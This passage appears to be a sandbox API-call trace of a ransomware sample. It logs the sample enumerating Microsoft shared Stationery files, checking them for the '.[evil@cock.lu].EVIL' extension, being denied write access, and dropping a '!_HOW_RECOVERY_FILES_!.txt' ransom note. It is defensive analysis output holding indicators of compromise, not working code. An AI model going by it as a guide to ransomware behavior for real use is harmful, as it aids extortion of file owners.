_Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Psychedelic.jpg") returned 74 [0089.130] wcscmp (_String1="Psychedelic.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.131] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Psychedelic.jpg") returned 0x0 [0089.131] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Psychedelic.jpg") returned 0x4a [0089.131] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.131] GetLastError () returned 0x5 [0089.131] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.131] wcsstr (_Str="Roses.htm", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.131] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 68 [0089.131] wcscmp (_String1="Roses.htm", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.131] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Roses.htm") returned 0x0 [0089.131] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm") returned 0x44 [0089.131] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.132] GetLastError () returned 0x5 [0089.132] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.132] wcsstr (_Str="Roses.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.132] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 68 [0089.132] wcscmp (_String1="Roses.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.132] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Roses.jpg") returned 0x0 [0089.132] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 0x44 [0089.132] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.132] GetLastError () returned 0x5 [0089.132] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.132] wcsstr (_Str="Sand_Paper.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.132] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Sand_Paper.jpg") returned 73 [0089.132] wcscmp (_String1="Sand_Paper.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.132] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Sand_Paper.jpg") returned 0x0 [0089.132] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Sand_Paper.jpg") returned 0x49 [0089.132] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.132] GetLastError () returned 0x5 [0089.132] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.132] wcsstr (_Str="Seyes.emf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.133] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Seyes.emf") returned 68 [0089.133] wcscmp (_String1="Seyes.emf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.133] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Seyes.emf") returned 0x0 [0089.133] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Seyes.emf") returned 0x44 [0089.133] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Seyes.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\seyes.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.133] GetLastError () returned 0x5 [0089.133] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.133] wcsstr (_Str="Shades of Blue.htm", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.133] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm") returned 77 [0089.133] wcscmp (_String1="Shades of Blue.htm", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.133] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Shades of Blue.htm") returned 0x0 [0089.133] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm") returned 0x4d [0089.133] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.133] GetLastError () returned 0x5 [0089.133] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.133] wcsstr (_Str="ShadesOfBlue.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.133] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 75 [0089.133] wcscmp (_String1="ShadesOfBlue.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.133] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ShadesOfBlue.jpg") returned 0x0 [0089.133] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 0x4b [0089.133] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.134] GetLastError () returned 0x5 [0089.134] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.134] wcsstr (_Str="Shorthand.emf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.134] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shorthand.emf") returned 72 [0089.134] wcscmp (_String1="Shorthand.emf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.134] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Shorthand.emf") returned 0x0 [0089.134] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shorthand.emf") returned 0x48 [0089.134] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shorthand.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shorthand.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.134] GetLastError () returned 0x5 [0089.134] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.134] wcsstr (_Str="Small_News.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.134] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Small_News.jpg") returned 73 [0089.134] wcscmp (_String1="Small_News.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.134] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Small_News.jpg") returned 0x0 [0089.134] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Small_News.jpg") returned 0x49 [0089.134] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Small_News.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\small_news.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.135] GetLastError () returned 0x5 [0089.135] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.135] wcsstr (_Str="Soft Blue.htm", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.135] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned 72 [0089.135] wcscmp (_String1="Soft Blue.htm", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.135] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Soft Blue.htm") returned 0x0 [0089.135] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned 0x48 [0089.135] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.135] GetLastError () returned 0x5 [0089.135] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.135] wcsstr (_Str="SoftBlue.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.135] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg") returned 71 [0089.135] wcscmp (_String1="SoftBlue.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.135] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SoftBlue.jpg") returned 0x0 [0089.135] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg") returned 0x47 [0089.135] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.136] GetLastError () returned 0x5 [0089.136] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.136] wcsstr (_Str="Stars.htm", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.136] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm") returned 68 [0089.136] wcscmp (_String1="Stars.htm", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.136] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Stars.htm") returned 0x0 [0089.136] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm") returned 0x44 [0089.136] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.136] GetLastError () returned 0x5 [0089.136] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.136] wcsstr (_Str="Stars.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.136] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 68 [0089.136] wcscmp (_String1="Stars.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.136] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Stars.jpg") returned 0x0 [0089.136] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 0x44 [0089.136] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.137] GetLastError () returned 0x5 [0089.137] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.137] wcsstr (_Str="Stucco.gif", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.137] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stucco.gif") returned 69 [0089.137] wcscmp (_String1="Stucco.gif", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.137] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Stucco.gif") returned 0x0 [0089.137] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stucco.gif") returned 0x45 [0089.137] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stucco.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stucco.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.137] GetLastError () returned 0x5 [0089.137] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.137] wcsstr (_Str="Tanspecks.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.137] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tanspecks.jpg") returned 72 [0089.137] wcscmp (_String1="Tanspecks.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.137] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Tanspecks.jpg") returned 0x0 [0089.137] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tanspecks.jpg") returned 0x48 [0089.137] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tanspecks.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tanspecks.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.138] GetLastError () returned 0x5 [0089.138] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.138] wcsstr (_Str="Tiki.gif", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.138] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tiki.gif") returned 67 [0089.138] wcscmp (_String1="Tiki.gif", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.138] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Tiki.gif") returned 0x0 [0089.138] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tiki.gif") returned 0x43 [0089.138] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tiki.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tiki.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.138] GetLastError () returned 0x5 [0089.138] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.138] wcsstr (_Str="To_Do_List.emf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.138] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\To_Do_List.emf") returned 73 [0089.138] wcscmp (_String1="To_Do_List.emf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.138] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="To_Do_List.emf") returned 0x0 [0089.138] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\To_Do_List.emf") returned 0x49 [0089.138] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\To_Do_List.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\to_do_list.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.138] GetLastError () returned 0x5 [0089.139] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.139] wcsstr (_Str="White_Chocolate.jpg", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.139] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\White_Chocolate.jpg") returned 78 [0089.139] wcscmp (_String1="White_Chocolate.jpg", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.139] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="White_Chocolate.jpg") returned 0x0 [0089.139] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\White_Chocolate.jpg") returned 0x4e [0089.139] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\White_Chocolate.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\white_chocolate.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.139] GetLastError () returned 0x5 [0089.139] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.139] wcsstr (_Str="Wrinkled_Paper.gif", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.139] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Wrinkled_Paper.gif") returned 77 [0089.139] wcscmp (_String1="Wrinkled_Paper.gif", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.139] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Wrinkled_Paper.gif") returned 0x0 [0089.139] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Wrinkled_Paper.gif") returned 0x4d [0089.139] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\Wrinkled_Paper.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\wrinkled_paper.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.139] GetLastError () returned 0x5 [0089.139] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0 [0089.139] FindClose (in: hFindFile=0x84b11dd560 | out: hFindFile=0x84b11dd560) returned 1 [0089.139] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 0x3a [0089.139] strlen (_Str="${KEY}") returned 0x6 [0089.139] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0089.139] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0089.139] strlen (_Str="${CODE}") returned 0x7 [0089.139] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0089.139] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.140] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.140] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\Stationery\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.140] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0089.140] __uncaught_exception () returned 0x84b1160800 [0089.140] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.141] FindNextFileW (in: hFindFile=0x84b11dd2c0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0089.141] wcsstr (_Str="TextConv", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.141] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv") returned 56 [0089.141] wcscmp (_String1=".", _String2="TextConv") returned -1 [0089.141] wcscmp (_String1="..", _String2="TextConv") returned -1 [0089.141] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv") returned 0x38 [0089.141] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv") returned 0x0 [0089.141] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv\\*" [0089.141] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11dd7a0 [0089.141] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.141] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv\\.") returned 58 [0089.141] wcscmp (_String1=".", _String2=".") returned 0 [0089.141] FindNextFileW (in: hFindFile=0x84b11dd7a0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.141] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.141] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv\\..") returned 59 [0089.141] wcscmp (_String1=".", _String2="..") returned -1 [0089.141] wcscmp (_String1="..", _String2="..") returned 0 [0089.141] FindNextFileW (in: hFindFile=0x84b11dd7a0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.141] wcsstr (_Str="en-US", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.141] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US") returned 62 [0089.142] wcscmp (_String1=".", _String2="en-US") returned -1 [0089.142] wcscmp (_String1="..", _String2="en-US") returned -1 [0089.142] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US") returned 0x3e [0089.142] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, 